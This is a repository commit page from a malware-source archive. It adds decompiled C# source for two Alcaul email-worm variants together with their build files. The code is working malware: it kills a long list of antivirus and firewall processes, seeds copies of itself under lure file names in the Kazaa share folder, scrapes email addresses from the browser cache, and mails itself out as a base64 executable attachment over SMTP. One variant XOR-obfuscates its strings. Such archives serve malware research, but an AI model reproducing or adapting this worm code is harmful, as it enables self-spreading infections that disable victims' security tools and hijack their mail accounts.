daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/Email-Worm.Win32.Alcaul.af.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>2peace</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="alcopaul\brigadaochodotnet.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/Email-Worm.Win32.Alcaul.af.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "2peace", "Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.csproj", "{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/_003CPrivateImplementationDetails_003E.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: 2peace, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78079FF0-2005-4E93-BF26-3EA1164CB45F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000003\u002D1 \u0024\u0024method0x6000003\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000003\u002D1
{
}
}
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/alcopaul/brigadaochodotnet.cs
+212
View File
@@ -0,0 +1,212 @@
// Decompiled with JetBrains decompiler
// Type: alcopaul.brigadaochodotnet
// Assembly: 2peace, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78079FF0-2005-4E93-BF26-3EA1164CB45F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Windows.Forms;
namespace alcopaul
{
public class brigadaochodotnet
{
public static void Main(string[] args)
{
string str1 = "zonealarm,wfindv32,vb6,webscanx,vsstat,vshwin32,vsecomr,vscan40,vettray,vet95,tds2-nt,tds2-98,tca,tbscan,sweep95,sphinx,smc,serv95,scrscan,scanpm,scan95,scan32,safeweb,rescue,rav7win,rav7,persfw,pcfwallicon,pccwin98,pavw,pavsched,pavcl,padmin,outpost,nvc95,nupgrade,normist,nmain,nisum,navwnt,navw32,navnt,navlu32,navapw32,n32scanw,mpftray,moolive,luall,lookout,lockdown2000,jedi,iomon98,iface,icsuppnt,icsupp95,icmon,icloadnt,icload95,ibmavsp,ibmasn,iamserv,iamapp,frw,fprot,fp-win,findviru,f-stopw,f-prot95,f-prot,f-agnt95,espwatch,esafe,ecengine";
string str2 = "dvp95_0,dvp95,cleaner3,cleaner,claw95cf,claw95,cfinet32,cfinet,cfiaudit,cfiadmin,blackice,blackd,avwupd32,avwin95,avsched32,avpupd,avptc32,avpm,avpdos32,avpcc,avp32,avp,avnt,avkserv,avgctrl,ave32,avconsol,autodown,apvxdwin,anti-trojan,ackwin32,_avpm,_avpcc,_avp32";
string[] strArray1 = str1.Split(',');
string[] strArray2 = str2.Split(',');
foreach (string ave in strArray1)
brigadaochodotnet.killprocs(ave);
foreach (string ave in strArray2)
brigadaochodotnet.killprocs(ave);
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string tach = brigadaochodotnet.uue(module.FullyQualifiedName);
Registry.CurrentUser.OpenSubKey("Software\\Kazaa\\LocalContent", true).SetValue("Dir0", (object) ("012345:" + Directory.GetCurrentDirectory()));
string[] strArray3 = new string[11]
{
"shakira.exe",
"avril_lavigne.exe",
"Visual_Studio.NET2003_key.exe",
"teach_yourself_c#_in_1_week.exe",
"scan.net.exe",
"hitman2fulldownloader.exe",
"Tekken4_full_downloader.exe",
"teach_yourself_COBOL.NET_in_21_days.exe",
"how_to_get_chicks_on_your_bed.exe",
"brigadaocho.net.exe",
"drunken_pope_pics.exe"
};
foreach (string destFileName in strArray3)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager", true);
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + registryKey1.GetValue("Default Mail Account").ToString(), true);
string mserv = registryKey2.GetValue("SMTP Server").ToString();
string fm = registryKey2.GetValue("SMTP Email Address").ToString();
foreach (string directory1 in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.InternetCache)))
{
foreach (string directory2 in Directory.GetDirectories(directory1))
{
foreach (string file in Directory.GetFiles(directory2, "*.ht*"))
brigadaochodotnet.extractmails(file, mserv, fm, tach);
}
}
int num = (int) MessageBox.Show("brigada ocho ::: \"bringing the c# technology to the masses\"", "msil.mass by PerrunBoy ::: http://vx.netlux.org/~b8", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
public static void extractmails(string phile, string mserv, string fm, string tach)
{
StreamReader streamReader = new StreamReader((Stream) new FileStream(phile, FileMode.OpenOrCreate, FileAccess.Read));
streamReader.BaseStream.Seek(0L, SeekOrigin.Begin);
while (streamReader.Peek() > -1)
{
string to = brigadaochodotnet.xtrak(streamReader.ReadLine());
if (to != "")
brigadaochodotnet.castaway(mserv, fm, to, tach);
}
streamReader.Close();
}
public static string xtrak(string datum)
{
char[] anyOf = new char[6]
{
'?',
'\'',
'"',
'>',
'<',
' '
};
string str1 = datum;
try
{
int sourceIndex = str1.IndexOf("mailto:");
int num = str1.LastIndexOfAny(anyOf);
char[] destination1 = new char[(int) checked ((uint) unchecked (num - sourceIndex))];
str1.CopyTo(sourceIndex, destination1, 0, num - sourceIndex);
string str2 = new string(destination1).Replace("mailto:", "").Replace("%20", "").Replace("%40", "@");
try
{
int count = str2.IndexOfAny(anyOf);
char[] destination2 = new char[(int) checked ((uint) count)];
str2.CopyTo(0, destination2, 0, count);
return new string(destination2);
}
catch
{
return str2;
}
}
catch
{
return "";
}
}
public static string uue(string attch)
{
FileStream input = new FileStream(attch, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
byte[] numArray = new byte[(int) checked ((uint) input.Length)];
int length1 = (int) input.Length;
int index1 = 0;
int num;
for (; length1 > 0; length1 -= num)
{
num = binaryReader.Read(numArray, index1, length1);
if (num != 0)
index1 += num;
else
break;
}
binaryReader.Close();
StringBuilder stringBuilder = new StringBuilder();
string base64String = Convert.ToBase64String(numArray);
int length2 = base64String.Length;
char[] destination = new char[(int) checked ((uint) length2)];
base64String.CopyTo(0, destination, 0, length2);
for (int index2 = 1; index2 <= length2; ++index2)
{
if (index2 % 76 == 0)
stringBuilder.Append(string.Format("{0}\r\n", (object) destination[index2 - 1]));
else
stringBuilder.Append(string.Format("{0}", (object) destination[index2 - 1]));
}
return stringBuilder.ToString();
}
public static void killprocs(string ave)
{
foreach (Process process in Process.GetProcessesByName(ave))
process.Kill();
}
public static void castaway(string serv, string from, string to, string attch)
{
string str1 = "From: " + from + " <" + from + ">\r\n";
string str2 = "To: " + to + " <" + to + ">\r\n";
string str3 = "Date: " + DateTime.Now.ToString() + "\r\n";
string str4 = "X-Mailer: dotNETSMTPengine\r\n";
string str5 = "X-Priority: 3\r\n";
string str6 = "MIME-Version: 1.0\r\n";
string str7 = "Content-Type: multipart/mixed; boundary=\"----=rerty\";\r\n\r\n";
string str8 = "This is a multi-part message in MIME format.\r\n\r\n";
string str9 = "------=rerty\r\n";
string str10 = "Content-Type: text/html; charset=us-ascii\r\n\r\n";
string str11 = "\"all we are saying, is give peace a chance. no to war and terrorism.\"\r\n\r\n";
string str12 = "------=rerty\r\n";
string str13 = "Content-Type: application/x-msdownload; name=\"topeace.exe\"\r\n";
string str14 = "Content-Transfer-Encoding: base64\r\n";
string str15 = "Content-Disposition: attachment; ";
string str16 = "filename=\"topeace.exe\"\r\n\r\n";
string str17 = "\r\n\r\n";
string str18 = "------=rerty--\r\n\r\n.\r\n";
TcpClient tcpClient = new TcpClient(serv, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
string str19 = streamReader.ReadLine();
byte[] bytes1 = Encoding.ASCII.GetBytes("HELO localhost\r\n");
stream.Write(bytes1, 0, bytes1.Length);
str19 = streamReader.ReadLine();
byte[] bytes2 = Encoding.ASCII.GetBytes("MAIL FROM: <" + from + ">\r\n");
stream.Write(bytes2, 0, bytes2.Length);
str19 = streamReader.ReadLine();
byte[] bytes3 = Encoding.ASCII.GetBytes("RCPT TO: <" + to + ">\r\n");
stream.Write(bytes3, 0, bytes3.Length);
str19 = streamReader.ReadLine();
byte[] bytes4 = Encoding.ASCII.GetBytes("DATA\r\n");
stream.Write(bytes4, 0, bytes4.Length);
str19 = streamReader.ReadLine();
byte[] bytes5 = Encoding.ASCII.GetBytes(str1 + str2 + str3 + str4 + str5);
stream.Write(bytes5, 0, bytes5.Length);
byte[] bytes6 = Encoding.ASCII.GetBytes(str6 + str7 + str8 + str9 + str10 + str11);
stream.Write(bytes6, 0, bytes6.Length);
byte[] bytes7 = Encoding.ASCII.GetBytes(str12 + str13 + str14 + str15 + str16 + attch + str17 + str18);
stream.Write(bytes7, 0, bytes7.Length);
str19 = streamReader.ReadLine();
byte[] bytes8 = Encoding.ASCII.GetBytes("QUIT\r\n");
stream.Write(bytes8, 0, bytes8.Length);
str19 = streamReader.ReadLine();
stream.Close();
streamReader.Close();
tcpClient.Close();
}
}
}
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/Email-Worm.Win32.Alcaul.ah.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>b</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="drunkenpope\brigada8.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/Email-Worm.Win32.Alcaul.ah.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "b", "Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.csproj", "{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Debug|Any CPU.Build.0 = Debug|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Release|Any CPU.ActiveCfg = Release|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/_003CPrivateImplementationDetails_003E.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: CECE5B53-4BE2-43C6-85BC-E30F20D8366F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000003\u002D1 \u0024\u0024method0x6000003\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000003\u002D1
{
}
}
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/drunkenpope/brigada8.cs
+230
View File
@@ -0,0 +1,230 @@
// Decompiled with JetBrains decompiler
// Type: drunkenpope.brigada8
// Assembly: b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: CECE5B53-4BE2-43C6-85BC-E30F20D8366F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Windows.Forms;
namespace drunkenpope
{
public class brigada8
{
public static void Main(string[] args)
{
try
{
string str1 = brigada8.modem("xmlgcncpo.udklft10.t`4.ug`qaclz.tqqvcv.tqjukl10.tqgamop.tqacl62.tgvvpc{.tgv;7.vfq0/lv.vfq0/;:.vac.v`qacl.quggr;7.qrjklz.qoa.qgpt;7.qapqacl.qaclro.qacl;7.qacl10.qcdgug`.pgqawg.pct5ukl.pct5.rgpqdu.raducnnkaml.raaukl;:.rctu.rctqajgf.rctan.rcfokl.mwvrmqv.lta;7.lwrepcfg.lmpokqv.lockl.lkqwo.lctulv.lctu10.lctlv.lctnw10.lctcru10.l10qaclu.ordvpc{.ommnktg.nwcnn.nmmimwv.nmaifmul0222.hgfk.kmoml;:.kdcag.kaqwrrlv.kaqwrr;7.kaoml.kanmcflv.kanmcf;7.k`octqr.k`ocql.kcoqgpt.kcocrr.dpu.drpmv.dr/ukl.dklftkpw.d/qvmru.d/rpmv;7.d/rpmv.d/celv;7.gqrucvaj.gqcdg.gagleklg");
string str2 = brigada8.modem("ftr;7]2.ftr;7.angclgp1.angclgp.ancu;7ad.ancu;7.adklgv10.adklgv.adkcwfkv.adkcfokl.`ncaikag.`ncaif.ctuwrf10.ctukl;7.ctqajgf10.ctrwrf.ctrva10.ctro.ctrfmq10.ctraa.ctr10.ctr.ctlv.ctiqgpt.cteavpn.ctg10.ctamlqmn.cwvmfmul.crtzfukl.clvk/vpmhcl.caiukl10.]ctro.]ctraa.]ctr10");
string[] strArray1 = str1.Split(',');
string[] strArray2 = str2.Split(',');
foreach (string vry324 in strArray1)
brigada8.kernelhalt(vry324);
foreach (string vry324 in strArray2)
brigada8.kernelhalt(vry324);
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string akt7 = brigada8.xmlparse234(module.FullyQualifiedName);
Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Icxcc^NmacnAmlvglv"), true).SetValue(brigada8.modem("Fkp2"), (object) (brigada8.modem("2301678") + Directory.GetCurrentDirectory()));
string[] strArray3 = new string[4]
{
brigada8.modem("Tkqwcn]Qvwfkm,LGV0221]ig{,gzg"),
brigada8.modem("vgcaj]{mwpqgnd]a!]kl]3]uggi,gzg"),
brigada8.modem("jkvocl0,gzg"),
brigada8.modem("Vgiigl6]dwnn,gzg")
};
foreach (string destFileName in strArray3)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Okapmqmdv^Klvgplgv\"Caamwlv\"Oclcegp"), true);
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Okapmqmdv^Klvgplgv\"Caamwlv\"Oclcegp^Caamwlvq^") + registryKey1.GetValue(brigada8.modem("Fgdcwnv\"Ockn\"Caamwlv")).ToString(), true);
string m91 = registryKey2.GetValue(brigada8.modem("QOVR\"Qgptgp")).ToString();
string foam = registryKey2.GetValue(brigada8.modem("QOVR\"Gockn\"Cffpgqq")).ToString();
foreach (string directory1 in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.InternetCache)))
{
foreach (string directory2 in Directory.GetDirectories(directory1))
{
foreach (string file in Directory.GetFiles(directory2, brigada8.modem("(,jv(")))
brigada8.melee(file, m91, foam, akt7);
}
}
int num = (int) MessageBox.Show(brigada8.modem("lm\"ompg\"`gvc\"vumq"), brigada8.modem("oqkn,ocqq,`\"*a!n{\"ocfg+\"`{\"cnamrcwn-`pkecfc\"majm"), MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
catch
{
}
}
public static void melee(string f91, string m91, string foam, string akt7)
{
StreamReader streamReader = new StreamReader((Stream) new FileStream(f91, FileMode.OpenOrCreate, FileAccess.Read));
streamReader.BaseStream.Seek(0L, SeekOrigin.Begin);
while (streamReader.Peek() > -1)
{
string hjkl = brigada8.harvest(streamReader.ReadLine());
if (hjkl != "")
{
try
{
brigada8.codedom563(m91, foam, hjkl, akt7);
}
catch
{
}
}
}
streamReader.Close();
}
public static string harvest(string helga)
{
char[] anyOf = new char[6]
{
'?',
'\'',
'"',
'>',
'<',
' '
};
string str1 = helga;
try
{
int sourceIndex = str1.IndexOf(brigada8.modem("ocknvm8"));
int num = str1.LastIndexOfAny(anyOf);
char[] destination1 = new char[(int) checked ((uint) unchecked (num - sourceIndex))];
str1.CopyTo(sourceIndex, destination1, 0, num - sourceIndex);
string str2 = new string(destination1).Replace(brigada8.modem("ocknvm8"), "").Replace("%20", "").Replace("%40", "@");
try
{
int count = str2.IndexOfAny(anyOf);
char[] destination2 = new char[(int) checked ((uint) count)];
str2.CopyTo(0, destination2, 0, count);
return new string(destination2);
}
catch
{
return str2;
}
}
catch
{
return "";
}
}
public static string xmlparse234(string tukoo)
{
FileStream input = new FileStream(tukoo, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
byte[] numArray = new byte[(int) checked ((uint) input.Length)];
int length1 = (int) input.Length;
int index1 = 0;
int num;
for (; length1 > 0; length1 -= num)
{
num = binaryReader.Read(numArray, index1, length1);
if (num != 0)
index1 += num;
else
break;
}
binaryReader.Close();
StringBuilder stringBuilder = new StringBuilder();
string base64String = Convert.ToBase64String(numArray);
int length2 = base64String.Length;
char[] destination = new char[(int) checked ((uint) length2)];
base64String.CopyTo(0, destination, 0, length2);
for (int index2 = 1; index2 <= length2; ++index2)
{
if (index2 % 76 == 0)
stringBuilder.Append(string.Format("{0}\r\n", (object) destination[index2 - 1]));
else
stringBuilder.Append(string.Format("{0}", (object) destination[index2 - 1]));
}
return stringBuilder.ToString();
}
public static void kernelhalt(string vry324)
{
foreach (Process process in Process.GetProcessesByName(vry324))
process.Kill();
}
public static string modem(string hhh)
{
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < hhh.Length; ++index)
{
int num = Convert.ToInt32(hhh[index]) ^ 2;
stringBuilder.Append(Convert.ToChar(num));
}
return stringBuilder.ToString();
}
public static void codedom563(string asdf, string cvbn, string hjkl, string tukoo)
{
string str1 = brigada8.modem("Dpmo8\"") + cvbn + " <" + cvbn + ">\r\n";
string str2 = brigada8.modem("Vm8\"") + hjkl + " <" + hjkl + ">\r\n";
string str3 = brigada8.modem("Fcvg8\"") + DateTime.Now.ToString() + "\r\n";
string str4 = brigada8.modem("Z/Ockngp8\"fmlmvvmwaj") + "\r\n";
string str5 = brigada8.modem("Z/Rpkmpkv{8\"1") + "\r\n";
string str6 = brigada8.modem("OKOG/Tgpqkml8\"3,2") + "\r\n";
string str7 = brigada8.modem("Amlvglv/V{rg8\"ownvkrcpv-okzgf9\"`mwlfcp{? //`q`h 9") + "\r\n\r\n";
string str8 = brigada8.modem("Vjkq\"kq\"c\"ownvk/rcpv\"ogqqceg\"kl\"OKOG\"dmpocv,") + "\r\n\r\n";
string str9 = "----bsbj\r\n";
string str10 = brigada8.modem("Amlvglv/V{rg8\"vgzv-jvon9\"ajcpqgv?wq/cqakk") + "\r\n\r\n";
string str11 = brigada8.modem(" Rggp/vm/Rggp\",LGV\"Qmdvucpg\"cvvcajgf,\"Pgswkpgq\"vjg\",LGV\"dpcogumpi, ") + "\r\n\r\n";
string str12 = "----bsbj\r\n";
string str13 = brigada8.modem("Amlvglv/V{rg8\"crrnkacvkml-z/oqfmulnmcf9\"lcog? lgvdz3,gzg ") + "\r\n";
string str14 = brigada8.modem("Amlvglv/Vpclqdgp/Glamfkle8\"`cqg46") + "\r\n";
string str15 = brigada8.modem("Amlvglv/Fkqrmqkvkml8\"cvvcajoglv9\"");
string str16 = brigada8.modem("dknglcog? lgvdz3,gzg ") + "\r\n\r\n";
string str17 = "\r\n\r\n";
string str18 = "----bsbj--\r\n\r\n.\r\n";
TcpClient tcpClient = new TcpClient(asdf, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
string str19 = streamReader.ReadLine();
byte[] bytes1 = Encoding.ASCII.GetBytes(brigada8.modem("JGNM\"nmacnjmqv") + "\r\n");
stream.Write(bytes1, 0, bytes1.Length);
str19 = streamReader.ReadLine();
byte[] bytes2 = Encoding.ASCII.GetBytes(brigada8.modem("OCKN\"DPMO8\"") + "<" + cvbn + ">\r\n");
stream.Write(bytes2, 0, bytes2.Length);
str19 = streamReader.ReadLine();
byte[] bytes3 = Encoding.ASCII.GetBytes(brigada8.modem("PARV\"VM8\"") + "<" + hjkl + ">\r\n");
stream.Write(bytes3, 0, bytes3.Length);
str19 = streamReader.ReadLine();
byte[] bytes4 = Encoding.ASCII.GetBytes(brigada8.modem("FCVC") + "\r\n");
stream.Write(bytes4, 0, bytes4.Length);
str19 = streamReader.ReadLine();
byte[] bytes5 = Encoding.ASCII.GetBytes(str1 + str2 + str3 + str4 + str5);
stream.Write(bytes5, 0, bytes5.Length);
byte[] bytes6 = Encoding.ASCII.GetBytes(str6 + str7 + str8 + str9 + str10 + str11);
stream.Write(bytes6, 0, bytes6.Length);
byte[] bytes7 = Encoding.ASCII.GetBytes(str12 + str13 + str14 + str15 + str16 + tukoo + str17 + str18);
stream.Write(bytes7, 0, bytes7.Length);
str19 = streamReader.ReadLine();
byte[] bytes8 = Encoding.ASCII.GetBytes(brigada8.modem("SWKV") + "\r\n");
stream.Write(bytes8, 0, bytes8.Length);
str19 = streamReader.ReadLine();
stream.Close();
streamReader.Close();
tcpClient.Close();
}
}
}